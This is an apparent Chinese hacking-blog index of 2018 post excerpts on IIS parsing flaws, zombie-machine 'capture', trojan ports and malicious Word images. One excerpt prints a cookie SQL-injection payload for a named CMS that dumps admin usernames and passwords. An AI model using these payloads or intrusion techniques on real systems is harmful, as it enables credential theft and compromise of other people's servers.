简谈如何防止网站被攻击

老猫 | 信息安全 | 2018-02-03
大家好我是China、猫叔 QQ:2189190137 今天我就和大家谈一下关于网站攻击的文章吧 想必大家都不想自己的网站被黑客攻击对吧? 所以,我们如何防止网站被攻击呢,那么我给大家带来了几条建议,希望纳取! 一是对脚本及安装程序进行升级,因为攻击者一般都是通过现在的第三方扩展软件或者脚本来发起攻击对吧。那么在这一些脚本通常不会被 [阅读全文]
ė552次浏览 60条评论 0 安全

IIS 7.5 解析错误命令执行漏洞

一、漏洞介绍 漏洞影响 IIS7 及IIS7.5 在使FastCGI方式调用php时,在php.ini里设置 cgi.fix_pathinfo=1 使得访问任意文件URL时,在URL后面添加“/x.php”等字符时,该文件被iis当php文件代码解析。 如 http://127.0.0.1/1.gif 的内容如下: 当访问 http:/ [阅读全文]

小白需要注意的C语言中static类型的变量何时赋值

MA2安全团队 | 编程 | 2018-02-03
答案应该是编译时赋值。 验证过程: 随便写一个c语言程序,如下: #include "stdio.h"   int main(){ static int i; static int j=0x12345678; printf("%02X ",ih[t]); return 0; [阅读全文]
ė598次浏览 60条评论 0 新手必备 C语言

WEB 0day漏洞合集(新手必备的渗透手册)

启航企业建站系统 cookie注入漏洞通杀所有版本 直接上exploit: javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));test:http://www.hack-ma2.cn/ [阅读全文]

外国骇客已对ATM机下手

MA2安全团队 | 新闻 | 2018-02-01
作者我MA2 沛以前去银行取钱的时候,经常在想:要是能让ATM机吐多一点钱就好了... 没想到还真有大佬做到了!!! 近日,一批国际黑客近期瞄准了美国,他们可以远程侵入提款机系统,或者直接替换硬盘,窃取现金。 多家美媒在29日发布消息称,全美很多地区的提款机中招。 此前,黑客们惯用的手法是在提款机上采用读卡机侧录器,窃取提款者的银行卡信 [阅读全文]
ė514次浏览 60条评论 0 IT新闻 系统安全

小白适用的mysql命令

MA2安全团队 | 编程 | 2018-02-01
(1)怎么在cmd中复制粘贴内容?   ——右键点标记,然后选择要复制的内容,再点一下右键即可   (2)怎么打开进入和退出数据库?   ——其中-h是主机名,可以写IP地址127.0.0.1,回车后,提示输入密码即可。 mysql -h localhost -u root -p [阅读全文]

云服务器和vps有什么区别

MA2安全团队 | SEO教程 | 2018-01-31
云服务器与VPS主机最本质的区别就是,云服务器是运行在物理服务器集群上的,而VPS主机是运行在一台物理服务器上。   一、资源独享和共享。VPS是包括磁盘、CPU、内存在内的资源都是共享的,一台服务器可能会有几十、上百个VPS,那么具体到每一台VPS主机上的性能就会很差,操作缓慢、很卡。而云服务器资源都是独享的,彻底杜绝抢资源的问题。   [阅读全文]
ė411次浏览 60条评论 0 SEO 新手必备

淡谈肉鸡的抓取

老猫 | Windows | 2018-01-27
大家好,我是China、猫叔 QQ:2189190137 上篇文章是MA2沛写的关于端口的文章 那么我这篇就介绍一下很热的两个抓肉鸡的端口吧,说是抓肉鸡但是目的并不是教你们去抓取肉鸡做坏事! 端口1:3389 端口2:4489 有可能很多人并不理解肉鸡是啥?抓肉鸡又是啥? 那么猫叔就和大家介绍一下肉鸡,就是随 [阅读全文]
ė1705次浏览 60条评论 0 抓鸡

端口介绍-木马服务都是开放哪些端口

端口:0 服务:Reserved 说明:通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口,当你试图使用通常的闭合端口连接它时将产生不同的结果。一种典型的扫描,使用IP地址为0.0.0.0,设置ACK位并在以太网层广播。 端口:1 服务:tcpmux 说明:这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者,默认情况下tcp [阅读全文]
ė383次浏览 60条评论 0 系统安全

抛开工具直接搞定cookie注入

老猫 | Windows | 2018-01-26
大家好我是China、猫叔 QQ:2189190137 今天给大家带来的是cookie注入 大家平时在入侵中碰到Cookie注入漏洞的时候,一般咋们采用的方法我想应该就是用“注入中转生成器”来生成一个asp页面吧? 然后将生成的页面文件放在asp的环境下,构造出合适的url就可以直接注入了对吧,方法虽然很简单,但是有的时候,专门为了一个 [阅读全文]
ė743次浏览 60条评论 0 渗透思路

图片渗透

老猫 | 信息安全 | 2018-01-26
大家好我还是那个老猫子China、猫叔   QQ:2189190137 今天要讲的是word文档利用图片来进行注入渗透。   word文档的渗透: 第一步,我们需要打开菜单栏上的“插入”选项卡并单击“图片”图标。这个时候会弹出资源管理器窗口。在文件名字段中输入一共恶意URL,并点击“插入” [阅读全文]
ė650次浏览 60条评论 0 渗透

软件加密切免费

老猫 | 信息安全 | 2018-01-25
大家好,我是china、猫叔   QQ:2189190137   今天给大家介绍的是一款加壳软件 在市面上的话我们一般都是见到的都是很棒的加密软件,但是有一个缺点,就是收费(不能说是缺点吧)打着保护壳旗号的忽悠壳,功能百花齐放,但是没钱的我们只能羡慕了 而今天要为大家介绍的是Shielden,这是一 [阅读全文]
ė620次浏览 60条评论 0 保护壳

Ɣ回顶部